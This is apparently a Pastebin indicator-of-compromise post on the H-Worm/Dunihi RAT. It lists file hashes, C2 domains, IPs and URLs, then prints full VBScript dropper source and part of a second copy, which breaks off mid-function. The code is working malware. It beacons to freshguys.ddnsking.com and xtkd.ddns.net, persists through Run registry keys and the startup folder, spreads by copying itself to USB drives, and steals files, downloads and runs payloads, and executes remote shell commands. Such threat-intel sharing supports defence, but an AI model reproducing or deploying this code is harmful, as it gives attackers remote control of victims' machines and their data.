Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #H-Worm #Dunihi #Adwin #RAT
- ---------------------------------
- 21-01-2019 IOC's
- ---------------------------------
- Main object- "9ed6f79853efcec2c6e17bb7def042f2b4373519b56f7b437ed85cf8d260b7cc.bin.gz"
- sha256 8f8e8b167a3a34c8bf4a99e2d0db589e6608a3789a7fc7deb3dfdc785de1e9cc
- sha1 d573a1d7482f9d8ad1b85725e1cc58c2034b3fdf
- md5 4a596594f3efc17edf98ad162f87e0cf
- Dropped executable file
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\awt.dll e5d4fc7d47a38a389884af1ea5f06f7c61c5cde6afc154a23a3cb5a127da1e34
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\decora_sse.dll adf4e9ce0866ff16a16f626cfc62355fb81212b1e7c95dd908e3644f88b77e91
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dt_shmem.dll c417390f681276ec0d55d81a91b87eae75ca245045f5c23e9b43550b708fb1a6
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\deploy.dll bff79fb05667992cc2bda9bae6e5a301baf553042f952203641ccd7e1fc4552d
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\eula.dll dec4f2f32edc45f70e7119c9e52c4cef44bb9aa627dbec1ee70f61d37468556b
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\glass.dll a92df0e1f93e29fae427da766d9b91bda4b421e6ab86aeb9cdd060b218028d35
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\fontmanager.dll 20bef5bcd523cff21bad585af91d1c913d5535a6b20ac70f5f3d8dafb2f90f25
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\fxplugins.dll 1c78673777d1d48bf9e1e247bc64231817dccec4b08cc5e8c7a7fc5ae1f32501
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dcpr.dll 80111e1d706741f5ef7f661835c3aa46664666425aa1b5f93103410f2bee1213
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dt_socket.dll f0fd0268d6e410c05e7ee71ad9c96744cd5e4a97329f608041d7078faee24ed0
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\bci.dll 7945365a3cd40d043dae47849e6645675166920958300e64dea76a865bc479af
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcp120.dll 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\klist.exe 298d8e2730a3dbe942ebe0379f7303bb2872fd7f05746851e47ed7588f541477
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\keytool.exe 8c40c13f83ea7c95b441548a455b57edac019b1cbfd6c6a068ddad33a6476ff1
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ktab.exe e89fe9520bcedbba20b5773598fb15e90dc828be7691adaa9d887ca585046aad
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcr120.dll 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\mlib_image.dll bb13a4ea915965aca971da50d9b90cbc0a32c99900eb585c6e9e12232b448fef
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\lcms.dll e179ace7a6d6cffeb7540d67ef56d86a96cd16c421154b0a8b499722a4e957d9
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\management.dll 035121aee1e7f257c582837e1a0bd2e240bc1d1a791354a803e5fa165be22d87
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\msvcr100.dll 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\kinit.exe 7cc34a5423bd3fc9fa63d20ebece4103e22e4360df5b9caa2b461069dac77f4d
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jaas_nt.dll e700d076614943e138b69f4a1f177914225ca35b93fed8b43bc4a86cfd87c59c
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\hprof.dll cc82beaa275f4ed4c33b694154bebc5fd097ada50072201d250aed3f269a41b6
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\net.dll 6d9bd64084180b7f1b7aa4902372879dc0400905856ac0c229ad33218f3257f1
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\nio.dll fb537564d240ac9b730941b5c0966209a5857e4d3ec0582ba0443fe391c74294
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\policytool.exe d81308da68136fd421eb56fa2b586ec6801ccf0827d85f495227e6d6c40fc69e
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\npt.dll 9145cb3b7fe40237e5c980404ade4c862d48e2d644aeba0006ec3a6f3e9505b5
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\pack200.exe 3047b67b36aee78b669fdedfe423e750b125837d92abcdc06983c34c65db71fc
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\orbd.exe 0f8cae56647464d75d2530cc9f7205c69911fced55e43a39d86ff4d435a018ed
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_common.dll 5264316be4820cbc940e0c277698e6f95ec99a52023e5ef85c3fbe624b45cdaf
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\glib-lite.dll 465541ef4e9337108b375984c23f5d31e6c060fed16820bb9bc5af79a2109eac
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_sw.dll 3f976b7efc9fe59abfe0bcde0d3b5af1cf133c64ad1508cb4a00cf2c104f5e81
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\gstreamer-lite.dll 379a14d561afeb364f8902c0b5193da229882c6273f2793339e1ad682af516f4
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\prism_d3d.dll f9108ac2555dbc5a6b43cc9504394089be60eae4127397dc651e06b3e7585b00
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\j2pkcs11.dll 91b6e445f5b4510c9d66641b1eed925f54dc2e84f3ddb0ff16ed5b0ac4bdc977
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jabswitch.exe a764db727ed6ec056ffe163dbb83db0ad0bd15b83181288c3afcd17a35e7d587
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java.exe df24b51772ff4959e9bbfe481f72f0e88ba6e7c031d60edb3b1a47c69f69a6d0
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javacpl.exe e7521e54f241e99bb5f7f2de1cd2fc49f3980dc43eb6c5b8fa251178f03616ef
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll 33fe38e43821c7e7d3b46317fab571926174492affd576f6ecd06bffe7a7c1b7
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\j2pcsc.dll 7a9f32ecba3dcaeb653293780812969e2534da7b8e652a24e56271cd088c7a36
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll ed68df1e549a092674259b1f806a31839ca426572020a7dbe0c46e492b272ec9
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javacpl.cpl e3259bb7ef907c0bb74e192e40e57fdf96c903bbc580975348dfef42839669ff
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_font.dll eada27806ccbf4d015f35f369b6880ef3dcc2eaa3b1ca89546fbdba8b05d9b5c
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java.dll 30a048a35865ca5bcea35ebecf7f01f08e8d20b0c4a3e9e0132540815eda1d89
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java-rmi.exe 2ba8cd9a3757ecf0b8b7de612d7f827de73f7e9da114b1979fe9d429a46f8109
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\instrument.dll 1a1d2c51b3db4507e4a4ad3e5afb6728e69acf9905d3df7c9dc5adbe83f7e96e
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\java_crw_demo.dll b34e72996d2c1a9b74a932c6259256b9001b73b3e7ef8c484afb61ff2517fba3
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jawt.dll b11633c87ac49873d1e8ef5bcf9335dbe0579f483b5c745c0034f79b3fd0ae8c
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jfxmedia.dll e62ec519aff414c1a81aeeb4cbf6de348b3b52ae527f14cedd42449e61fb1548
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll 8019cd10ef1a1ddae179364934d1a0304cfcfc67be2dd7bca4ee8def93a89ef4
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javaw.exe 11054aa4170990ad1d345a2caf15285f3157e4bf240015cc20431b7373a52fc2
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javaws.exe 3514c54f5d552b2cb64b9e2f8d8c5f65807e1d49fe82689a16f6a3e7521fb437
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\javafx_iio.dll e880cd6207c687437dd2ca60008ea375bd99b1c07075674cad1052f41b631a97
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jfr.dll 28da2d3e61a12408b8d9f86398f9c78f551e48404bd2c7bdccd8cbd74ed5e5a3
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jdwp.dll f9a0e87300c8d094bb45834dd128e70a49d6d5d2cef20133411a769c01195c04
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2launcher.exe d8e40564694d5a2fdd85ab5345d8589e637e387d59160a74737832670da01597
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jjs.exe c4916ed2eefc2ae2394625691f5550142eda6cb33e5e713d1e203b76b2141509
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2iexp.dll 5cd202cd92f33cbad11898331dec0791bf0bccf8ddf22849942debde007c3317
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\rmid.exe 6513c40184d496e86e34e327c960b06d20900c3092084a708d890f5376c43cf5
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jpeg.dll 8cf3344453c02bf21ff8c79a6189f25617ca38cee2632766d0aa4ee07277bc25
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jli.dll 45c6aa5006ebaf8ab63f26134f2753bf4f20497942de58bc734e437e2d0f32f6
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\resource.dll 15b4fdfe5ddb1820ddc468ac5d0e65045ca6aaea21d3a5a66ecaa8fc1ce48835
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\kcms.dll 0ecd837ae93404f0aacfa6efc20f3c3ce6d1ae683e60a1c8873f07bfc8f93dc4
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2ssv.dll e5328bcaec7fdba85097c04d5f4f35f648753b3378fb1d9ee6ce6965b9562e90
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jp2native.dll f5faf9f49ca7f199f572e4227896ae839596cc9f6039875f3fa3a0eaddc40084
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsoundds.dll b534c43f203c5502e43a5d0fdbfbd9422de342aade635009fab791eb82f3c020
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\splashscreen.dll a6ea1b705acdda1bb3cd1c3cdcbfe7c86c81654537db8b48f65a781578ffbd77
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\verify.dll 266d7992f7518b7cda33ba5251b0636b00ee13e6b17021311dcc1ba4dd2fc705
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ssv.dll 5eb2d05ffc733e7ec63cb271201f87c7724793e5b92b875551ced1cebb505f3f
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsound.dll 5303366d9447a7610bd971339f27333767d399fca0a3f01154b082d47bd0a46e
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\ssvagent.exe 4ada2d738b490cc63f3c18f151239dfde615af8a4eaf44b8021642ff9a25b8f2
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\unpack200.exe a6316854fe790d22e6264ee3abc3be49686e6e36299c9718be9a20bb3e9fb185
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\unpack.dll 2864b031237c6a68eedab256732e43558b5741ae4f68a07a068438469ad907d9
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\servertool.exe bbe145615886dbb3f4ada7617d1a15fe2aee6cea5dbe34e9c216d1bde1121891
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\zip.dll 9a7251883229ccc36859b02894b541a369c2426a9b5cbdc7e8a10db36f13451e
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\jsdt.dll fe5d22121d6a683bb87b362da85cabf8aead1c171d347d0a16da64c74dd8a3bc
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\t2k.dll d66f567fc2a33434063731832719cad75418c619dd30dcf6c339d2d3da32c7bb
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll 699e5ff6df1060df61a32e99c8fc52837f40f774bfa88136af10036f4dd4a578
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\tnameserv.exe 9f37d44545726fb5aeb03285d3866266322b833cd1a1fde340497c7d9358f775
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\sunmscapi.dll 9c235bbfa97e6a8fc7e09a4ac12f84c8ed8855998410e96dd44e1b64ef951a80
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll 161f737f9c90e67f0fb80e7cd9d6823f83bdd1d971108faa99c6088c278a4f2a
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\wsdetect.dll a78345586e443e0adc6554951946ad874f61ba2ff724fa8121df546a4b21df4a
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\rmiregistry.exe ba2d5038501cf3f3a31616a122f6cd2554d13219e717ef89c6aa1a07eb1cc145
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\sunec.dll 23b40cf8e64e1a262ef9ff5b9e01246c082eeaa6039b4b05f92e1bd536bd7166
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\client\jvm.dll 156afc715e865695ddf69d4a7db5fea2023b39748febfd86add15e9498c26639
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll adaaa9037be30c708865a6627df9c0e43acf93d100469e5fdf83f632d2fe1829
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll 62248d7ab742e200996bf87433b4e8478e4d8bcfbc0a2ee7cbe3a5a62f6268c3
- sha256 C:\Users\admin\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll d1deaa4b7feebfeed58eda969c9fb9bc5791ad7e67f47c596280375cbda3f46f
- sha256 C:\Users\admin\AppData\Local\Temp\Windows8381702355763314501.dll a6be5be2d16a24430c795faa7ab7cc7826ed24d6d4bc74ad33da5c2ed0c793d0
- DNS requests
- domain freshguys.ddnsking.com
- domain xtkd.ddns.net
- Connections
- ip 194.5.99.53
- ip 113.11.252.97
- HTTP/HTTPS requests
- url http://freshguys.ddnsking.com:5674/is-ready
- url http://xtkd.ddns.net:3233/is-ready
- url http://freshguys.ddnsking.com:5674/is-sending%3C%7C%3EC:/Users/Business/Desktop/adk.jar
- -------------------------------------------------------------------------------------------------------------
- [1st .VBS dropper]
- -------------------------------------------------------------------------------------------------------------
- [Dunihi]
- 'pashinta
- host = "freshguys.ddnsking.com"
- port = 5674
- installdir = "%temp%"
- lnkfile = false
- lnkfolder = false
- dim shellobj
- set shellobj = wscript.createobject("wscript.shell")
- dim filesystemobj
- set filesystemobj = createobject("scripting.filesystemobject")
- dim httpobj
- set httpobj = createobject("msxml2.xmlhttp")
- installname = wscript.scriptname
- startup = shellobj.specialfolders ("startup") & "\"
- installdir = shellobj.expandenvironmentstrings(installdir) & "\"
- if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
- spliter = "<" & "|" & ">"
- sleep = 5000
- dim response
- dim cmd
- dim param
- info = ""
- usbspreading = ""
- startdate = ""
- dim oneonce
- on error resume next
- instance
- while true
- install
- response = ""
- response = post ("is-ready","")
- cmd = split (response,spliter)
- select case cmd (0)
- case "excecute"
- param = cmd (1)
- execute param
- case "update"
- param = cmd (1)
- oneonce.close
- set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
- oneonce.write param
- oneonce.close
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
- wscript.quit
- case "uninstall"
- uninstall
- case "send"
- download cmd (1),cmd (2)
- case "site-send"
- sitedownloader cmd (1),cmd (2)
- case "recv"
- param = cmd (1)
- upload (param)
- case "enum-driver"
- post "is-enum-driver",enumdriver
- case "enum-faf"
- param = cmd (1)
- post "is-enum-faf",enumfaf (param)
- case "enum-process"
- post "is-enum-process",enumprocess
- case "cmd-shell"
- param = cmd (1)
- post "is-cmd-shell",cmdshell (param)
- case "delete"
- param = cmd (1)
- deletefaf (param)
- case "exit-process"
- param = cmd (1)
- exitprocess (param)
- case "sleep"
- param = cmd (1)
- sleep = eval (param)
- end select
- wscript.sleep sleep
- wend
- sub install
- on error resume next
- dim lnkobj
- dim filename
- dim foldername
- dim fileicon
- dim foldericon
- upstart
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
- if filesystemobj.fileexists (drive.path & "\" & installname) then
- filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
- end if
- for each file in filesystemobj.getfolder( drive.path & "\" ).Files
- if not lnkfile then exit for
- if instr (file.name,".") then
- if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 2+4
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
- if instr (fileicon,",") = 0 then
- lnkobj.iconlocation = file.path
- else
- lnkobj.iconlocation = fileicon
- end if
- lnkobj.save()
- end if
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- if not lnkfolder then exit for
- folder.attributes = 2+4
- foldername = folder.name
- set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
- lnkobj.windowstyle = 7
- lnkobj.targetpath = "cmd.exe"
- lnkobj.workingdirectory = ""
- lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
- if instr (foldericon,",") = 0 then
- lnkobj.iconlocation = folder.path
- else
- lnkobj.iconlocation = foldericon
- end if
- lnkobj.save()
- next
- end If
- end If
- end if
- next
- err.clear
- end sub
- sub uninstall
- on error resume next
- dim filename
- dim foldername
- shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
- filesystemobj.deletefile startup & installname ,true
- filesystemobj.deletefile wscript.scriptfullname ,true
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- for each file in filesystemobj.getfolder ( drive.path & "\").files
- on error resume next
- if instr (file.name,".") then
- if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
- file.attributes = 0
- if ucase (file.name) <> ucase (installname) then
- filename = split(file.name,".")
- filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
- else
- filesystemobj.deletefile (drive.path & "\" & file.name)
- end If
- else
- filesystemobj.deletefile (file.path)
- end if
- end if
- next
- for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
- folder.attributes = 0
- next
- end if
- end if
- end if
- next
- wscript.quit
- end sub
- function post (cmd ,param)
- post = param
- httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
- httpobj.setrequestheader "user-agent:",information
- httpobj.send param
- post = httpobj.responsetext
- end function
- function information
- on error resume next
- if inf = "" then
- inf = hwid & spliter
- inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
- inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set os = root.execquery ("select * from win32_operatingsystem")
- for each osinfo in os
- inf = inf & osinfo.caption & spliter
- exit for
- next
- inf = inf & "plus" & spliter
- inf = inf & security & spliter
- inf = inf & usbspreading
- information = inf
- else
- information = inf
- end if
- end function
- sub upstart ()
- on error resume Next
- shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
- filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
- filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
- end sub
- function hwid
- on error resume next
- set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set disks = root.execquery ("select * from win32_logicaldisk")
- for each disk in disks
- if disk.volumeserialnumber <> "" then
- hwid = disk.volumeserialnumber
- exit for
- end if
- next
- end function
- function security
- on error resume next
- security = ""
- set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
- for each objitem in colitems
- versionstr = split (objitem.version,".")
- next
- versionstr = split (colitems.version,".")
- osversion = versionstr (0) & "."
- for x = 1 to ubound (versionstr)
- osversion = osversion & versionstr (i)
- next
- osversion = eval (osversion)
- if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
- set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
- Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
- for each objantivirus in colantivirus
- security = security & objantivirus.displayname & " ."
- next
- if security = "" then security = "nan-av"
- end function
- function instance
- on error resume next
- usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
- if usbspreading = "" then
- if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
- usbspreading = "true - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- else
- usbspreading = "false - " & date
- shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
- end if
- end If
- upstart
- set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
- set installfullnameshort = filesystemobj.getfile (installdir & installname)
- if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
- wscript.quit
- end If
- err.clear
- set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
- if err.number > 0 then wscript.quit
- end function
- sub sitedownloader (fileurl,filename)
- strlink = fileurl
- strsaveto = installdir & filename
- set objhttpdownload = createobject("msxml2.xmlhttp" )
- objhttpdownload.open "get", strlink, false
- objhttpdownload.send
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- sub download (fileurl,filedir)
- if filedir = "" then
- filedir = installdir
- end if
- strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
- set objhttpdownload = createobject("msxml2.xmlhttp")
- objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
- objhttpdownload.send ""
- set objfsodownload = createobject ("scripting.filesystemobject")
- if objfsodownload.fileexists (strsaveto) then
- objfsodownload.deletefile (strsaveto)
- end if
- if objhttpdownload.status = 200 then
- dim objstreamdownload
- set objstreamdownload = createobject("adodb.stream")
- with objstreamdownload
- .type = 1
- .open
- .write objhttpdownload.responsebody
- .savetofile strsaveto
- .close
- end with
- set objstreamdownload = nothing
- end if
- if objfsodownload.fileexists(strsaveto) then
- shellobj.run objfsodownload.getfile (strsaveto).shortpath
- end if
- end sub
- function upload (fileurl)
- dim httpobj,objstreamuploade,buffer
- set objstreamuploade = createobject("adodb.stream")
- with objstreamuploade
- .type = 1
- .open
- .loadfromfile fileurl
- buffer = .read
- .close
- end with
- set objstreamdownload = nothing
- set httpobj = createobject("msxml2.xmlhttp")
- httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
- httpobj.send buffer
- end function
- function enumdriver ()
- for each drive in filesystemobj.drives
- if drive.isready = true then
- enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
- end if
- next
- end Function
- function enumfaf (enumdir)
- enumfaf = enumdir & spliter
- for each folder in filesystemobj.getfolder (enumdir).subfolders
- enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
- next
- for each file in filesystemobj.getfolder (enumdir).files
- enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
- next
- end function
- function enumprocess ()
- on error resume next
- set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
- set colitems = objwmiservice.execquery("select * from win32_process",,48)
- dim objitem
- for each objitem in colitems
- enumprocess = enumprocess & objitem.name & "|"
- enumprocess = enumprocess & objitem.processid & "|"
- enumprocess = enumprocess & objitem.executablepath & spliter
- next
- end function
- sub exitprocess (pid)
- on error resume next
- shellobj.run "taskkill /F /T /PID " & pid,7,true
- end sub
- sub deletefaf (url)
- on error resume next
- filesystemobj.deletefile url
- filesystemobj.deletefolder url
- end sub
- function cmdshell (cmd)
- dim httpobj,oexec,readallfromany
- set oexec = shellobj.exec ("%comspec% /c " & cmd)
- if not oexec.stdout.atendofstream then
- readallfromany = oexec.stdout.readall
- elseif not oexec.stderr.atendofstream then
- readallfromany = oexec.stderr.readall
- else
- readallfromany = ""
- end if
- cmdshell = readallfromany
- end function
- --------------------------------------------------------------
- 2nd. .VBS dropper
- --------------------------------------------------------------
- '<[ recoder : houdini (c) skype : houdini-fx ]>
- '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- host = "xtkd.ddns.net"
- port = 3233
- installdir = "%temp%"
- lnkfile = false
- lnkfolder = false
- '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
- dim shellobj
- set shellobj = wscript.createobject("wscript.shell")
- dim filesystemobj
- set filesystemobj = createobject("scripting.filesystemobject")
- dim httpobj
- set httpobj = createobject("msxml2.xmlhttp")
- '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
- installname = wscript.scriptname
- startup = shellobj.specialfolders ("startup") & "\"
- installdir = shellobj.expandenvironmentstrings(installdir) & "\"
- if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
- spliter = "<" & "|" & ">"
- sleep = 5000
- dim response
- dim cmd
- dim param
- info = ""
- usbspreading = ""
- startdate = ""
- dim oneonce
- '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
- on error resume next
- instance
- while true
- install
- response = ""
- response = post ("is-ready","")
- cmd = split (response,spliter)
- select case cmd (0)
- case "excecute"
- param = cmd (1)
- execute param
- case "update"
- param = cmd (1)
- oneonce.close
- set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
- oneonce.write param
- oneonce.close
- shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
- wscript.quit
- case "uninstall"
- uninstall
- case "send"
- download cmd (1),cmd (2)
- case "site-send"
- sitedownloader cmd (1),cmd (2)
- case "recv"
- param = cmd (1)
- upload (param)
- case "enum-driver"
- post "is-enum-driver",enumdriver
- case "enum-faf"
- param = cmd (1)
- post "is-enum-faf",enumfaf (param)
- case "enum-process"
- post "is-enum-process",enumprocess
- case "cmd-shell"
- param = cmd (1)
- post "is-cmd-shell",cmdshell (param)
- case "delete"
- param = cmd (1)
- deletefaf (param)
- case "exit-process"
- param = cmd (1)
- exitprocess (param)
- case "sleep"
- param = cmd (1)
- sleep = eval (param)
- end select
- wscript.sleep sleep
- wend
- sub install
- on error resume next
- dim lnkobj
- dim filename
- dim foldername
- dim fileicon
- dim foldericon
- upstart
- for each drive in filesystemobj.drives
- if drive.isready = true then
- if drive.freespace > 0 then
- if drive.drivetype = 1 then
- filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
